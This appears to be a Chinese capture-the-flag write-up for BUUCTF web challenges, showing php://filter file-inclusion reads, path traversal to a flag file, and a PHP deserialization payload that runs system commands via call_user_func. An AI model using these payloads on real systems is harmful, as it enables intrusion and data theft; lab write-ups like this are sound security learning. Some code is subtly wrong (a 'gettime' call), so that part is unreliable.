BUUCTF-WEB(36-40)

[BSidesCF 2020]Had a bad day

参考：
[BUUCTF：BSidesCF 2020]Had a bad day_末初的技术博客_51CTO博客
[buuctf-BSidesCF 2020]Had a bad day(小宇特详解)-CSDN博客
应该是文件包含

我这里利用;1，然后报错，我发现他是直接会加上一个.php，那我们试试伪协议读取

1. ?category=php://filter/read=convert.base64-encode/resource=index

复制代码

base64解码出

1. [/code]这个代码内里必须含有 woofers，meowers, index
2. 然后我们就试着包含一下flag
3. [code]?category=meowers/../flag

复制代码

发现源码多了

那接下来我们就是读取，仍旧利用php://

1. php://filter/read=convert.base64-encode/woofers/resource=flag

复制代码

解码得到

[网鼎杯 2020 朱雀组]phpweb

参考：
v (cnblogs.com)

抓包发现还穿了这两个参数
然后发现是call_user_func()函数去下令执行
我们可以输入

1. func=file_get_contents&p=index.php

复制代码

去看这个代码的文件

可以构造反序列化

然后payload

1. func=unserialize&p=O:4:"Test":2:{s:1:"p";s:2:"ls";s:4:"func";s:6:"system";}

复制代码

然后根目次也找不到flag，我们就用find，这里要url编码，然后用get传输，防止一些字符没用成功输入进去

1. <?php
2. class Test {
3.         var $p = "find / -name flag*";
4.         var $func = system;
5.         function __destruct() {
6.             if ($this->func != "") {
7.                 echo gettime($this->func, $this->p);
8.             }
9.         }
10. }
11. $a=new Test();
12. echo serialize($a);

复制代码

访问这个Starting前面这个/test.php

[GXYCTF2019]禁止套娃

开局就是天崩，没啥东西

dirsearch扫了一下也是没发现什么东西
有大概是git泄露，用githack试试

然后我这也扫描不到，挺奇怪的，这道题放一放

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。